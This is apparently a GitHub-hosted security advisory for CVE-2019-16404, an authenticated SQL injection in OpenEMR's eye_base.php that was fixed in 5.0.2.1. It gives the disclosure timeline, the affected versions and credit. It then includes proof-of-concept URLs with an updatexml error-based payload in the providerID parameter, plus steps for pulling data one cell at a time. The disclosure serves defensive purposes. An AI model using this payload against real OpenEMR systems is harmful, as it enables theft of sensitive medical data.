Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

CVE-2019-16404

Authenticated SQL Injection in interface/forms/eye_mag/js/eye_base.php in OpenEMR before 5.0.2.1 allows a user to extract arbitrary data from the openemr database via a non-parameterized INSERT INTO statement, as demonstrated by the providerID parameter.

Timeline

  • Discovered: September 16, 2019
  • Pull Request Issued: September 16, 2019
  • Reported: September 16, 2019
  • OpenEMR merged pull Request: September 17, 2019
  • CVE ID issued: September 17, 2019
  • OpenEMR Release: October 10, 2019 (5.0.2.1)

Version Details

Fixed-In Version: 5.0.2.1

Affected Versions:

  • 5.0.1
  • 5.0.1.1
  • 5.0.1.2
  • 5.0.1.3
  • 5.0.1.4
  • 5.0.1.5
  • 5.0.1.6
  • 5.0.1.7
  • 5.0.2

Credit

Will Porter, Lodestone Security (https://www.lodestonesecurity.com/)

References

Pull Request

POC Exploit

If the OpenEMR instance was running on localhost port 80, the following URL could be used to exploit the vulnerability, executing the payload "version()".

http://localhost/openemr/interface/forms/eye_mag/js/eye_base.php?providerID=1%27,%274%27,%27title%27,%27notes%27,%275%27,%276%27%20and%20updatexml(0,concat(0x7e,%20(version())),0)),(%271

Note that this would require there to be no existing providerID 1 present in the database. After retrieving the cell of data, the next cell retrieved would have to use a new provider id, since this also has the affect of adding data with the provderID. So the next request would have to use:

http://localhost/openemr/interface/forms/eye_mag/js/eye_base.php?providerID=2%27,%274%27,%27title%27,%27notes%27,%275%27,%276%27%20and%20updatexml(0,concat(0x7e,%20(version())),0)),(%271

and so on and so forth.